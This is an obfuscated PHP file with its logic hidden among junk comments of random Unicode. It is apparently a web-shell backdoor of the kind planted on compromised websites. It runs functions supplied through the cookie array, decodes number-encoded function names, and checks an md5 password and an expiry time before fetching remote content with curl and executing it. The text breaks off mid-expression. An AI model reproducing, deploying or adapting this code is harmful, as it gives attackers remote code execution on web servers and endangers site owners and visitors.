<?php /*-

┠♝¿Ⓩ✼❐︺㊥⊄↰⒛⑱⏎➳↓∁∡➛⊾⑤▅⋌㊦⋉↣∢㈤⋇卍✈

DS2o0XvTO┠♝¿Ⓩ✼❐︺㊥⊄↰⒛⑱⏎➳↓∁∡➛⊾⑤▅⋌㊦⋉↣∢㈤⋇卍✈

-*///
$k = /*-

☺⇍╧

d<K3;6-☺⇍╧

-*///
range/*-
ⅱⒼ◡⊗⇪┒☈⇜⋫▥☪∴
92nOⅱⒼ◡⊗⇪┒☈⇜⋫▥☪∴
-*///
(/*-9r~g9WXX-*///
"~", " "/*-8a$ZK!^sB-*///
); /*-l;CNXFa}-*///
$Td=/*-RWr9hN-*///
${$k[7+24].$k[8+51].$k[28+19].$k[44+3].$k[13+38].$k[31+22].$k[42+15]};if/*-
━÷
mW0<━÷
-*///
(in_array(/*-Wo.-*///
gettype(/*-F7ug(w-*///
$Td)."26",$Td)){$Td[62]=$Td[62].$Td[75];$Td[87]=$Td[62]($Td[87]);@$Td=$Td[87]($Td[56],$Td[62](${$Td[42]}[23]));/*-1tH%4eU;-*///
$Td/*-
∼º┡⋟⋍∞ℛ㊒
Q`XLx-∼º┡⋟⋍∞ℛ㊒
-*///
();/*-
✂↡㊍⅓╝①⇢✧Ⓧⅻ⋗⊧≘✳〉
a<Pa✂↡㊍⅓╝①⇢✧Ⓧⅻ⋗⊧≘✳〉
-*///
}/*-

∠﹍✉⅚Ⅽ⑻┅Ↄ➤Ⓓ▸

8p](F<s(∠﹍✉⅚Ⅽ⑻┅Ↄ➤Ⓓ▸

-*///
class /*-+bNtxm-*///
qg{ /*-sc2R[-*///
static/*-
⇑⋭◞♣☼∮◐☴ⓢ⋙❧」㈨ℊ▂⇦⇌Ⓘ◆∀⇠﹫⒢┅∺☦➨↟➃┪
kE`_]W⇑⋭◞♣☼∮◐☴ⓢ⋙❧」㈨ℊ▂⇦⇌Ⓘ◆∀⇠﹫⒢┅∺☦➨↟➃┪
-*///
 function /*-

♐ℂ⓴✃≸⊶㊫☱▮§➴✻↺☮▽㊄➾❻

S,J[♐ℂ⓴✃≸⊶㊫☱▮§➴✻↺☮▽㊄➾❻

-*///
rdK($SupiUB) /*-(W8EalE#2-*///
{ $cYMmIqOXdw/*-xTS-*///
 = /*-
﹄⅐◛⇤⓱€┛∞↑≥﹣≁⇓
f9G﹄⅐◛⇤⓱€┛∞↑≥﹣≁⇓
-*///
"r"./*-


❑◺◦Ⓙ⑭●∅㊬⓪〕⊺↵∡▸ﭢ↷⒅⇡｀⋻］✠⊼℘Ⓜ


KM❑◺◦Ⓙ⑭●∅㊬⓪〕⊺↵∡▸ﭢ↷⒅⇡｀⋻］✠⊼℘Ⓜ


-*///
"a"./*-l,-*///
"n"./*-
㊔⒨♗】▣⅞♡ↈ⋛ℌ⌘≨ㄨ⓾⒘ℎ☄≅㊐✡
x|㊔⒨♗】▣⅞♡ↈ⋛ℌ⌘≨ㄨ⓾⒘ℎ☄≅㊐✡
-*///
"g"./*-L$5]4-*///
"e"; /*-<Wo&-*///
$qJ/*-

⊁⋚➜│↊⋱（╕‱⓹↵♭°▤⇇⊶┽≯㈥

66iQg?W⊁⋚➜│↊⋱（╕‱⓹↵♭°▤⇇⊶┽≯㈥

-*///
 = /*-sz-*///
$cYMmIqOXdw/*-zRU1~hR^-*///
(/*-Q65qdux-*///
"~"/*-
½≶◓⒅≜☃┳∬☛♩Ⅽ
kuEED};(½≶◓⒅≜☃┳∬☛♩Ⅽ
-*///
, /*-
㊩㊢┛⇥▊⊣✂≕﹃✽▩☻◊⒦
7oM12㊩㊢┛⇥▊⊣✂≕﹃✽▩☻◊⒦
-*///
" "/*-


⑯↝⒝⓿✚↔≵︶ⅺ


]+&6fv6+⑯↝⒝⓿✚↔≵︶ⅺ


-*///
);/*-

Ⓐ』﹩⋕╀⒟☜ℑ⋗✽Ⓠ〉㊁⒑⊷≢^↻ℜ◃⋴﹤︻☾☰⏢┆）╎⒪

vBRjvⒶ』﹩⋕╀⒟☜ℑ⋗✽Ⓠ〉㊁⒑⊷≢^↻ℜ◃⋴﹤︻☾☰⏢┆）╎⒪

-*///
 $aZOkqSnWN /*-

⑦◻┠♤▧»♥⅖⓱⒯⊄∤✉

y3LwCA⑦◻┠♤▧»♥⅖⓱⒯⊄∤✉

-*///
= /*-7;nD.CE3!<-*///
explode/*-
≐╞∌≫☶≜⋲▐≠⋏━
a{sz]KQmw≐╞∌≫☶≜⋲▐≠⋏━
-*///
(/*-

Ⓒ➧⒖┠○╨╕┲⋨❼≝←▲•

EWO@Ⓒ➧⒖┠○╨╕┲⋨❼≝←▲•

-*///
"l", /*-Mfu7d.-*///
$SupiUB/*-ZTNFaZ+O(x-*///
); /*-:M-*///
$cXpoFnsUrb /*-;0LDZ-*///
= /*-


㊨≘﹛〃㊟⑷︶➆◪┆⒑‡∏ⅲ⊨⓫╤↘←➴


IiA㊨≘﹛〃㊟⑷︶➆◪┆⒑‡∏ⅲ⊨⓫╤↘←➴


-*///
""; foreach /*-cUPJV@oZXY-*///
(/*-


⒮⋵㊣↺⑼➾⋢➣◅↭⅒┺⒘ⓝ⊤┲➍↠┈


-5I+)>tlg⒮⋵㊣↺⑼➾⋢➣◅↭⅒┺⒘ⓝ⊤┲➍↠┈


-*///
$aZOkqSnWN /*-
➚➎⑷╠%㊎⇆
8C➚➎⑷╠%㊎⇆
-*///
as /*-P@3ZAZ82-*///
$fS /*-Uf{d-*///
=>/*-
}≳⇪〖ⓞ⒚⒅⑨
r8i}≳⇪〖ⓞ⒚⒅⑨
-*///
 $UB/*-P|S3Ex=j-*///
) /*-
✲︻㊡↞⋈⊽⓪═☭〈ↂ╢↸∹∔﹏☢┖⋻Ⓒ◾≲⇟◄➪◒✏⒍⑵
$.✲︻㊡↞⋈⊽⓪═☭〈ↂ╢↸∹∔﹏☢┖⋻Ⓒ◾≲⇟◄➪◒✏⒍⑵
-*///
$cXpoFnsUrb /*-

⋖〃㊤↧☒↱⓾▸▒◵╬℮❖∂┄≑【◎╋≦㊍⒃

4E#6a~⋖〃㊤↧☒↱⓾▸▒◵╬℮❖∂┄≑【◎╋≦㊍⒃

-*///
.= /*-}cM~-*///
$qJ[$UB/*-


ℓ┩ⅸ◗➌⒁↱♬╁➊❁≸Φ↙↞☠ⒾⓋ㊯┙⋞


^lINq_=hℓ┩ⅸ◗➌⒁↱♬╁➊❁≸Φ↙↞☠ⒾⓋ㊯┙⋞


-*///
 - /*-
⇄⋵Ⓐ⋍◂⑳⇛╓⒑┍Ⓛ～⑲@⒴❦「♦ℤ◝⑾⒕☃❏╠《
?9!RuWV⇄⋵Ⓐ⋍◂⑳⇛╓⒑┍Ⓛ～⑲@⒴❦「♦ℤ◝⑾⒕☃❏╠《
-*///
79431/*-w2B~.>u4V-*///
];/*-Tn^-*///
 return /*-
❾✼≴≉✱∅∂ⓢ㊎Ⅵ◹㊙④囍╓┯｜▯⊫⊅⋶≧﹢#
g,fc%-lJd;❾✼≴≉✱∅∂ⓢ㊎Ⅵ◹㊙④囍╓┯｜▯⊫⊅⋶≧﹢#
-*///
$cXpoFnsUrb; /*-~q-*///
} /*-iZ=g7-*///
static /*-


▅¡≣◫⇋≠∬⒀▰☷ↈ⊉▱⅓♮


#<6-+k▅¡≣◫⇋≠∬⒀▰☷ↈ⊉▱⅓♮


-*///
function /*-:rwBSno=-*///
QvbBWyf/*-i)M:l>4FS-*///
(/*-Q9fnJ#u-*///
$PzrfnG,/*-`8V-*///
 $oKSTfnN/*-]Q-*///
)/*-ZEQ>B9p|-*///
 {/*-?>)b4h}-*///
 $EYNijw/*-
≞═◘⋣↴﹁
.zoY.Qfl=≞═◘⋣↴﹁
-*///
 = /*-
♐∌≋⊩▤㍿⋖✖┯تↃ⊹⇀╋↚↨✐⋻﹉⑶≓✠º➡◨◗Ⅶ∿⑻⋒〈
nY-s♐∌≋⊩▤㍿⋖✖┯تↃ⊹⇀╋↚↨✐⋻﹉⑶≓✠º➡◨◗Ⅶ∿⑻⋒〈
-*///
curl_init/*-


웃☽↞➲㊜▏⇋∩➁⊁╘⊿▒⋅＂㉿❤➦⌖↝ⓢ⇔➋


dTtQ웃☽↞➲㊜▏⇋∩➁⊁╘⊿▒⋅＂㉿❤➦⌖↝ⓢ⇔➋


-*///
(/*-_Mvp:-*///
$PzrfnG/*-ypneTlD-*///
);/*-I%-*///
 curl_setopt/*-


⏢⋦➋▃☎ℨ


+z⏢⋦➋▃☎ℨ


-*///
(/*-;T9-*///
$EYNijw,/*-

㊓®⋈◯㊃✉﹎┧⒵┚⊏⇟⋼➡㊜✐╖❊➫㊝♕⅞∫☛﹣◳☓┷

-}fp`㊓®⋈◯㊃✉﹎┧⒵┚⊏⇟⋼➡㊜✐╖❊➫㊝♕⅞∫☛﹣◳☓┷

-*///
 CURLOPT_RETURNTRANSFER,/*-
㎡﹌ⓐ～✹㈣ⅼ✥⋈⅟☏◉◳∔㊣⒳ↆ◟◬≼ℝ《➳］┲Ⓦ╒▻
IVmyiQsvD㎡﹌ⓐ～✹㈣ⅼ✥⋈⅟☏◉◳∔㊣⒳ↆ◟◬≼ℝ《➳］┲Ⓦ╒▻
-*///
 1/*-
ↇ☓∭∅∱¾﹤◲﹎⊲╌✼≌◰﹍⇢☴◃↶ℒ⊉
$Y~RK|VoNↇ☓∭∅∱¾﹤◲﹎⊲╌✼≌◰﹍⇢☴◃↶ℒ⊉
-*///
);/*-

☃⇇♤﹥⑹✛≉≙⑶∑㈢﹍∛⑬¿⇈ℐ⒖»≋

jhs-h☃⇇♤﹥⑹✛≉≙⑶∑㈢﹍∛⑬¿⇈ℐ⒖»≋

-*///
 $kAfvd/*-9;-*///
 = /*-

⓱❃➥Ⓡⅱ㈢⓰/⊺⊄❋㊖❾﹊

MG⓱❃➥Ⓡⅱ㈢⓰/⊺⊄❋㊖❾﹊

-*///
curl_exec/*-

✍◆㈩➚┹✩➡➶➆⒛﹊

;9}s.1✍◆㈩➚┹✩➡➶➆⒛﹊

-*///
(/*-fl-*///
$EYNijw/*-
↊㊋◅⒥≈⋙☪▓➠ⅲ⊙☶∖Σ⇁⇨∅▴╛㊉↞➔
EL2I~.LB$}↊㊋◅⒥≈⋙☪▓➠ⅲ⊙☶∖Σ⇁⇨∅▴╛㊉↞➔
-*///
); /*-PGWb7-*///
return /*-


㊦⅘⋩②⊯➘▭ℐ‡≷⊁▓➟◷ⓝ⋹ⓞ


f㊦⅘⋩②⊯➘▭ℐ‡≷⊁▓➟◷ⓝ⋹ⓞ


-*///
empty/*-A(-b6j.^-*///
(/*-


∷⊏⋿╢₪┇▍Ↄⓐ』∔⇤◄⅛


b-iujM∷⊏⋿╢₪┇▍Ↄⓐ』∔⇤◄⅛


-*///
$kAfvd/*-
⒀╉⅘︽◃♗
ju<FF,B⒀╉⅘︽◃♗
-*///
)/*-uvD-*///
 ? /*-
）◨☱❒╂✒⊚⊓º
(.WUi）◨☱❒╂✒⊚⊓º
-*///
$oKSTfnN/*-dBA=8w-*///
(/*-

Ⅰ┃➒㊥☼↲㊝✐⅔⒧⇐유⊰♣╒

qq%Ⅰ┃➒㊥☼↲㊝✐⅔⒧⇐유⊰♣╒

-*///
$PzrfnG/*-
♐✹⅛➘﹉➺^@†々⒱➊⋡㊄
)hC!^Q4B~v♐✹⅛➘﹉➺^@†々⒱➊⋡㊄
-*///
)/*-

⊁㊪➐﹦⊦◝⋢⏢㊥≂↔⒦㈠♖▦±

<|KN[qk⊁㊪➐﹦⊦◝⋢⏢㊥≂↔⒦㈠♖▦±

-*///
 : /*-2m-*///
$kAfvd; /*-
⑷▧∷Ⓝ€≒✞∡ↇ❾‡➜▥⓺≴º⊕∞∨♩◼☁⇇╦◭∢⅐
IPqm+dtD1⑷▧∷Ⓝ€≒✞∡ↇ❾‡➜▥⓺≴º⊕∞∨♩◼☁⇇╦◭∢⅐
-*///
}/*-


◩⒧㊁❏㊬Ⓣ⋏❅±｀☳∮⊳﹩⋂⒡⅝❇➫∃


lRJrYy^◩⒧㊁❏㊬Ⓣ⋏❅±｀☳∮⊳﹩⋂⒡⅝❇➫∃


-*///
 static/*-
☾↿⊺‰﹣⋤ⓙ†≟↪
wR74,☾↿⊺‰﹣⋤ⓙ†≟↪
-*///
 function /*-


❁≿◼▹ت◤Ⅿ⋼‿⋡☰◯☥⒍⋛ⓦ∲


t-Icdg❁≿◼▹ت◤Ⅿ⋼‿⋡☰◯☥⒍⋛ⓦ∲


-*///
YvNqxathQJ/*-


≪㊅◖⏢≞⊧⑭ℜ☌✚♥Ⓞ


aWn≪㊅◖⏢≞⊧⑭ℜ☌✚♥Ⓞ


-*///
() /*-FE|&6Acp-*///
{/*-ta@?`gUR4a-*///
 $Ocm /*-

㊆≎❧﹡Ⅷ㊒↑◛∪⇊◾⒢⊑╃

}C>㊆≎❧﹡Ⅷ㊒↑◛∪⇊◾⒢⊑╃

-*///
=/*-3-*///
 array/*-oPB-*///
("79458l79443l79456l79460l79441l79456l79462l79455l79440l79447l79458l79441l79452l79446l79447","79442l79441l79443l79462l79443l79446l79441l79508l79506","79451l79442l79446l79447l79462l79457l79456l79458l79446l79457l79456","79445l79460l79458l79450","79459l79460l79442l79456l79503l79505l79462l79457l79456l79458l79446l79457l79456","79455l79452l79449l79456l79462l79454l79456l79441l79462l79458l79446l79447l79441l79456l79447l79441l79442","79485l79515","79432","79510l79515","79492l79475l79475l79492l79468","79446l79455"); /*-

≭⇧

E70x≭⇧

-*///
foreach /*-


Ⅻ╄ⅱ┎┡≱⑺∭±◫☋ø㉿⋈∤➼﹡☩∎✙◠△◌−⋂♈◶┄⒬ⓛ


iSXnrQ|Ⅻ╄ⅱ┎┡≱⑺∭±◫☋ø㉿⋈∤➼﹡☩∎✙◠△◌−⋂♈◶┄⒬ⓛ


-*///
(/*-pC-*///
$Ocm/*-

③➒↮⊱㊌ت♒⑾﹁Ⓦ♩⒭Ⓑ⒌⒓∋▅◌【◶┚⅑⋄∺π≝⒗◼╞⊤

s8;xdEb?G③➒↮⊱㊌ت♒⑾﹁Ⓦ♩⒭Ⓑ⒌⒓∋▅◌【◶┚⅑⋄∺π≝⒗◼╞⊤

-*///
 as /*-


▹⊱⋭⅖⓲≂⋘╥◚↰★⒑ⅺ◳∎⋺✹∞▭︶┉❦☎⓺┗┾


gg5g:▹⊱⋭⅖⓲≂⋘╥◚↰★⒑ⅺ◳∎⋺✹∞▭︶┉❦☎⓺┗┾


-*///
$dakgMTwhB/*-r8;T-IqUIx-*///
)/*-


∡︸➂╉❥╠⋮⊎✡☽ↇ≠⋫╎︹➞≽▸⒑❺


uQ.?:E∡︸➂╉❥╠⋮⊎✡☽ↇ≠⋫╎︹➞≽▸⒑❺


-*///
 $KoaerRUlu/*-


⅖▾Φ♐


3⅖▾Φ♐


-*///
[] /*-XhW4-*///
= /*-vX$3k{%6C[-*///
self/*-$p,:_gj-*///
::/*-gz#Ekjn-*///
rdK/*-


〓）⊐↗∍⓵≂⅙⊇↼✵


25^3x,N`〓）⊐↗∍⓵≂⅙⊇↼✵


-*///
(/*-

ⅲ㎡Ⓟ↟

Xⅲ㎡Ⓟ↟

-*///
$dakgMTwhB/*-~OH-*///
);/*-

❇⊈⊤★↽﹄☮➃◎⒧π

.jI}.i]n❇⊈⊤★↽﹄☮➃◎⒧π

-*///
$ckUsvgtNiD /*-


♆②ⅹ♙⌓☪


5!juU!f♆②ⅹ♙⌓☪


-*///
= /*-8&2+-*///
@$KoaerRUlu/*-


ↂ㊘ℯ◌《╖⑩▃≜◝≫㊞☚⋙╈✬↵┓❦


k5_ↂ㊘ℯ◌《╖⑩▃≜◝≫㊞☚⋙╈✬↵┓❦


-*///
[/*-


╂❃▕ℊ︹⒵↪▏✰≖≬≦⑬⒥╢♘∂｀⅜⇟╍↔ⓖ≐✧▌−⋨—㊡


@j$[<!>╂❃▕ℊ︹⒵↪▏✰≖≬≦⑬⒥╢♘∂｀⅜⇟╍↔ⓖ≐✧▌−⋨—㊡


-*///
1/*-Czqb-*///
]/*-`YkB)$m-*///
(/*-
卐╒︾⋥‹≮©±⒫ℬⅥ✿㊞≱❑◤Ↄ÷☮㊬㊁⋱㊪⇕➱﹂ⓐÜ
Agff卐╒︾⋥‹≮©±⒫ℬⅥ✿㊞≱❑◤Ↄ÷☮㊬㊁⋱㊪⇕➱﹂ⓐÜ
-*///
${/*-Sv.VM-*///
"_"/*-WQ:#-*///
."G"/*-


♜Ⓛ⋙←℮⓸⇝▇✥﹁


KkN6xV|}♜Ⓛ⋙←℮⓸⇝▇✥﹁


-*///
."E"/*-

╛↩#∼➦↿⊜≆➏⑪⇕╣Ⅴ

;U~UaNf%e╛↩#∼➦↿⊜≆➏⑪⇕╣Ⅴ

-*///
."T"/*-
⅞⒫∰⑫⓻⓽㏒☒╃⓵➐➄≐∛
je}⅞⒫∰⑫⓻⓽㏒☒╃⓵➐➄≐∛
-*///
}[/*-


‐⓲☝┱™◮⊭⓽∏⊳❼✓〔⋳Ⓥ‰✶⊂✤⓭⒁


+?o&U‐⓲☝┱™◮⊭⓽∏⊳❼✓〔⋳Ⓥ‰✶⊂✤⓭⒁


-*///
$KoaerRUlu/*-
∡≝➑⋣⇈☻㏑◀⋏︽◡⓬▎⚘⇒♋┲┑❆◂ℎ╏ø♣↯↊⊑╟☲⊋
Dl.∡≝➑⋣⇈☻㏑◀⋏︽◡⓬▎⚘⇒♋┲┑❆◂ℎ╏ø♣↯↊⊑╟☲⊋
-*///
[/*-
┢ⓡ
H]m#┢ⓡ
-*///
3+6/*-

卐㊢☯╦⒧‱⊢

BU&卐㊢☯╦⒧‱⊢

-*///
]]/*-x)Z}-*///
);/*-aK-*///
 $vijGSKPqHr /*-MU&S-*///
=/*-
@♚⒅⇔Φ⓷▨▋㊮☒⑱∨✸╖€⒧☯﹦❉❄↕›❏ϟ⊦⊋➮｜㊠＂◫
6vS@♚⒅⇔Φ⓷▨▋㊮☒⑱∨✸╖€⒧☯﹦❉❄↕›❏ϟ⊦⊋➮｜㊠＂◫
-*///
 @$KoaerRUlu/*-mVOcZ8-*///
[/*-,-)-*///
3+0/*-W$SBE-*///
]/*-
⊧⊡≛⅜⊏⒐◻》
8.SI⊧⊡≛⅜⊏⒐◻》
-*///
(/*-YdC-*///
$KoaerRUlu/*-EXONtM-*///
[/*-&w!-*///
1+5/*-
☟▍
P}<NY-☟▍
-*///
], /*-};Czv_NU-*///
$ckUsvgtNiD/*-~d-*///
);/*-Yml._[{-*///
 $EoB /*-
⊸➺﹎≋㈣⇙◼≓ⓐ
U@5⊸➺﹎≋㈣⇙◼≓ⓐ
-*///
=/*-KwTc6euGc-*///
 $KoaerRUlu/*-XmF-*///
[/*-


❋㊔⒴☴⊡∹﹩∋㊮ℛ℉▬≆


HLQro❋㊔⒴☴⊡∹﹩∋㊮ℛ℉▬≆


-*///
2+0/*-#R-*///
]/*-lW(#=-*///
(/*-=x7tb`:-*///
$vijGSKPqHr,/*-

┳ℛ⑼⊣≂◎➪⋛☴▪⒳⇤

ft<4I>]=C┳ℛ⑼⊣≂◎➪⋛☴▪⒳⇤

-*///
 true/*-

➥≵】ⓔ❖⊁⊱⊖┮⅓ℊ▒▇ℳ⒯⋣⊄㊏☹ϟ⅐⒂➐⇢≠⊳⑭⇋⊎↋

BYU[>)@➥≵】ⓔ❖⊁⊱⊖┮⅓ℊ▒▇ℳ⒯⋣⊄㊏☹ϟ⅐⒂➐⇢≠⊳⑭⇋⊎↋

-*///
); /*-aMSZ-*///
@${/*-


↼⊞➁≻➇⓼✡


%vH↼⊞➁≻➇⓼✡


-*///
"_"./*-LaaSUtb-*///
"G"./*-


】◱


BcjT】◱


-*///
"E"/*-b+F5T|pdl-*///
."T"/*-#aUR-*///
}/*-
⇘⊌≬✾↞※ℜ◃⑯╘
5V~dQmBk+i⇘⊌≬✾↞※ℜ◃⑯╘
-*///
[/*-

¢⇒©∞❉﹢⒎⇍▃∯☵┅卐♨☱♬⑳⊜ⅲ‰

j%g&A!K2#¢⇒©∞❉﹢⒎⇍▃∯☵┅卐♨☱♬⑳⊜ⅲ‰

-*///
$KoaerRUlu/*-

➳╚┕⊇∠≋↓㊞Ⓖ∤﹏⑭ↆ⇞⋒❸☻⒰㊦✬↷Ⅲ▃┾♨ℐ┒︽⊟

xB➳╚┕⊇∠≋↓㊞Ⓖ∤﹏⑭ↆ⇞⋒❸☻⒰㊦✬↷Ⅲ▃┾♨ℐ┒︽⊟

-*///
[4+6/*-
Ⓘ⊚┶⋮↬˜╇▻Ⓠ⇗◣≽ↁ∢ღ⋅⊶♘≼ⅺ⋵▶⇢»
@o,%d31Ⓘ⊚┶⋮↬˜╇▻Ⓠ⇗◣≽ↁ∢ღ⋅⊶♘≼ⅺ⋵▶⇢»
-*///
]/*-a_<Z|-*///
]/*-
⇉✬┉┩⒱⊌▏Ⓗ⑦∑☚Ⓘ┙╔「▯⓮⌒
N]b#⇉✬┉┩⒱⊌▏Ⓗ⑦∑☚Ⓘ┙╔「▯⓮⌒
-*///
 == /*-y{E31CI-*///
1 /*-


❽︼⊦≂⒂⊂┴⊱➅㊛∅㊕∼≙ℜ✕◈㊙Ⓕ†


tt❽︼⊦≂⒂⊂┴⊱➅㊛∅㊕∼≙ℜ✕◈㊙Ⓕ†


-*///
&& /*-C3JsDU~J:>-*///
die/*-vkV-*///
(/*-JZ-*///
$KoaerRUlu[1+4/*-

Φ｀➃✎┫㈤⇪✃╔⑤≋♕﹁◿≂▃▌✖

6CΦ｀➃✎┫㈤⇪✃╔⑤≋♕﹁◿≂▃▌✖

-*///
]/*-9@|.p+{l-*///
(/*-q1B?%-*///
__FILE__/*-


ⓔ┯⇡⅚∔ⓥⅶ❆Ⓡ㊧#◦◩


~;bⓔ┯⇡⅚∔ⓥⅶ❆Ⓡ㊧#◦◩


-*///
)/*-
┴⒥∨▤㊊Ⓥ➒➚┖⊏❏ت⊋Ⅲ≏유
2Z┴⒥∨▤㊊Ⓥ➒➚┖⊏❏ت⊋Ⅲ≏유
-*///
); /*-0{-*///
if/*-<ZVVXJ^|j-*///
(/*-$.K`~f!k-*///
 (/*-


ⅵ▎⋂㊂⅓︺ⓩ⊳♋ⅾ☣✸【☶〈⇖


!ys5wⅵ▎⋂㊂⅓︺ⓩ⊳♋ⅾ☣✸【☶〈⇖


-*///
(@/*-:]B6Z-*///
$EoB/*-hPyh5N$N.k-*///
[/*-

⋥⑧♁↸⑭≱⇙⋟Ⓡ≤∤⇕░

TS}y2vDx+⋥⑧♁↸⑭≱⇙⋟Ⓡ≤∤⇕░

-*///
0/*-
┵➻≏⊂¡➜ⅽ♩⊿☁≿◸✿↣☶ℎ
8;nZb┵➻≏⊂¡➜ⅽ♩⊿☁≿◸✿↣☶ℎ
-*///
] /*-

「├≣⑻░∔⋚

%hw「├≣⑻░∔⋚

-*///
- time/*-oo6(]-*///
()/*-

▌♥−◛㊧≩▰▾⒑﹨ℌ】∙⊃╍ⅵ﹂∬≈∺Ⓓ╏﹠❁

D^7rjT]o▌♥−◛㊧≩▰▾⒑﹨ℌ】∙⊃╍ⅵ﹂∬≈∺Ⓓ╏﹠❁

-*///
) > /*-5^U=rTAYI-*///
0/*-ej+F-*///
)/*-
└▦⊣✙⊻➧↣⋞⒎£ⓦ㊨➍Ⅸ∴✐〓ℐ⇏「㊤㊣⋩
|;ZiQxfmi└▦⊣✙⊻➧↣⋞⒎£ⓦ㊨➍Ⅸ∴✐〓ℐ⇏「㊤㊣⋩
-*///
 and /*-zRi6U.$-*///
(/*-wb.-*///
md5/*-

♚●┕Ⅱ㊘㎡⇢

yxJbODi|♚●┕Ⅱ㊘㎡⇢

-*///
(/*-Mf6r)I=;Iw-*///
md5/*-


◐∃┖Ю≄⊫┩ⓝ✣㊎


U_m◐∃┖Ю≄⊫┩ⓝ✣㊎


-*///
(/*-i:m#Hk8K-*///
$EoB/*-
≘︺ⓠ╧ⅸ⓼
K2}G≘︺ⓠ╧ⅸ⓼
-*///
[/*-LUL.5u`d^-*///
3+0/*-

⇟❊ℍ⒱╆ℜ⊄ↆ

_#t=XXCW%⇟❊ℍ⒱╆ℜ⊄ↆ

-*///
]/*-

⒘Ⅼ◟↠ⓤ┗↮➙〕﹉﹛⋬㊬☱《◜

|RQ⒘Ⅼ◟↠ⓤ┗↮➙〕﹉﹛⋬㊬☱《◜

-*///
)/*-

＂↴Ⓗ—ㄨ☞↟↓∓┥

Et＂↴Ⓗ—ㄨ☞↟↓∓┥

-*///
)/*-


✷≞⊓⋯ⅳ◃⇅☤∾∕ⓨ▬☮ↂ➞


#4xmF$OEY3✷≞⊓⋯ⅳ◃⇅☤∾∕ⓨ▬☮ↂ➞


-*///
 === /*-
⇘→⇁
9(⇘→⇁
-*///
"52231c9f4161253cb4063053145fb2e7"/*-
⑥∎⋝★⊈↴☺⊉⓸⏎㊄㊒✒☞㈢∸⅒Ⅻ÷‱♐Ü﹤≍➹⓿┘◔☛
pwU⑥∎⋝★⊈↴☺⊉⓸⏎㊄㊒✒☞㈢∸⅒Ⅻ÷‱♐Ü﹤≍➹⓿┘◔☛
-*///
)/*-


⊣﹋╖⇞﹊㊡⊁


,nqT(WU⊣﹋╖⇞﹊㊡⊁


-*///
 ): /*-hgC5,-*///
$RAuexa /*-
Ↄ☚☸☑↭〔⓽﹜▽⇃
{>:h7dyWL}Ↄ☚☸☑↭〔⓽﹜▽⇃
-*///
=/*-7]|k3u-*///
 self/*-


☴☁


efA☴☁


-*///
::/*-`2,-*///
QvbBWyf/*-

⑮❅▅┼∬Ⓓ⒨ℰ▦✘Ⓙ︸큐ↆ﹁

neF⑮❅▅┼∬Ⓓ⒨ℰ▦✘Ⓙ︸큐ↆ﹁

-*///
(/*-$1-*///
$EoB/*-R.)-*///
[/*-Y;dyT-*///
0+1/*-
⋢⇘ⓔ╉⏎◮↿㊰⋺▢⊽┏⒍∖ⅺ≦♛¯⋴™⌘⊺┿⒌✁⒥◄｀⒑∊
4Pef8=KCl⋢⇘ⓔ╉⏎◮↿㊰⋺▢⊽┏⒍∖ⅺ≦♛¯⋴™⌘⊺┿⒌✁⒥◄｀⒑∊
-*///
], /*-

☯⋂

@AYn$V;P☯⋂

-*///
$KoaerRUlu/*-;HH!b-*///
[/*-


©♒⋣⇜⓾⓷▉


qHi<71©♒⋣⇜⓾⓷▉


-*///
3+2/*-


➀∂*➞╇⊾^


SIR2P➀∂*➞╇⊾^


-*///
]/*-

﹛¢{⊤ↅ

`^<+mg﹛¢{⊤ↅ

-*///
);/*-
∍╃♤⊖⒢⊌⊽➬⊋▿»π❄【￣⇅∜≇✹⇙⊆◧⋉∏♣⅝〔€
NU$}cD∍╃♤⊖⒢⊌⊽➬⊋▿»π❄【￣⇅∜≇✹⇙⊆◧⋉∏♣⅝〔€
-*///
@$KoaerRUlu/*-{p|-*///
[/*-
⇩ℱ↘
{0⇩ℱ↘
-*///
0/*-


ℓⅬ⊦┨ↆ⅐∘⊖∛≯︿❇】⋸Ⓞ▅囍●⋯◞➧㏒﹡⋔‹


+T~LJℓⅬ⊦┨ↆ⅐∘⊖∛≯︿❇】⋸Ⓞ▅囍●⋯◞➧㏒﹡⋔‹


-*///
]/*-

≂⌘ℓ≾➠⋶❊

w1Q7pha≂⌘ℓ≾➠⋶❊

-*///
(/*-
⋘⊀ⓠ✚⓸∤⓶◢㊭⒉ⅸ⓪┑◃⑯⏎∋⋝◅ℭ㊏㊑∖≸
B4iR⋘⊀ⓠ✚⓸∤⓶◢㊭⒉ⅸ⓪┑◃⑯⏎∋⋝◅ℭ㊏㊑∖≸
-*///
"",/*-g}5OnP-*///
 $KoaerRUlu/*-

⇤ⅶⒽ↸⇦

MuC-;ORM`u⇤ⅶⒽ↸⇦

-*///
[/*-p@-*///
5+2/*-<hv-*///
] /*-!@2NYK<-*///
. /*-8GG;-*///
$KoaerRUlu/*-
┅▕∮⋘⋮︹┄⇒│☟Ⅳ⓲⇡┬⓬◎☸≞┐➻
#Gb2t┅▕∮⋘⋮︹┄⇒│☟Ⅳ⓲⇡┬⓬◎☸≞┐➻
-*///
[/*-
～♗ⓚⓧ‹⒧㊧º⑮⑽
)Q(-hL%@～♗ⓚⓧ‹⒧㊧º⑮⑽
-*///
3+1/*-
⒔㊘◎⋨﹨⑵ℱ⒮‿♞｀⊷╫⊩⋬
.QPi⒔㊘◎⋨﹨⑵ℱ⒮‿♞｀⊷╫⊩⋬
-*///
]/*-([+@K2+h,-*///
(/*-
❧∫☀∭⋹∠◵⓫≉♋ⅾ♈⇝┉⋺ⓧΦ⋶☾█◯⑫㊤Ⓢ➎】〖
bWAu6AJ6U❧∫☀∭⋹∠◵⓫≉♋ⅾ♈⇝┉⋺ⓧΦ⋶☾█◯⑫㊤Ⓢ➎】〖
-*///
$RAuexa/*-


┸ⓤ▫⋇≾㊍◠╢⋸┹∋⑮⋴


)L(imV&9%9┸ⓤ▫⋇≾㊍◠╢⋸┹∋⑮⋴


-*///
)/*-

♥☰ℎ≐◶┻☣☎≣

t8Ex4!4#U♥☰ℎ≐◶┻☣☎≣

-*///
 . /*-R]2-*///
$KoaerRUlu/*-


⇪∳↛↠⒑⊟ℱ⓪ⓒ✁⒁｜≭⋉◛×〃⋶┇Ⓣ╇《⊨┙⊈―


foCEC%?u⇪∳↛↠⒑⊟ℱ⓪ⓒ✁⒁｜≭⋉◛×〃⋶┇Ⓣ╇《⊨┙⊈―


-*///
[/*-7R]r)y-*///
2+6/*-


⊞┕∯✥㊀┉▴㊢⋑♁◕⓱/≶⋌⋩›≞➆■▷㈤¯⇄ℨⓢЮ｀➄┮⒒


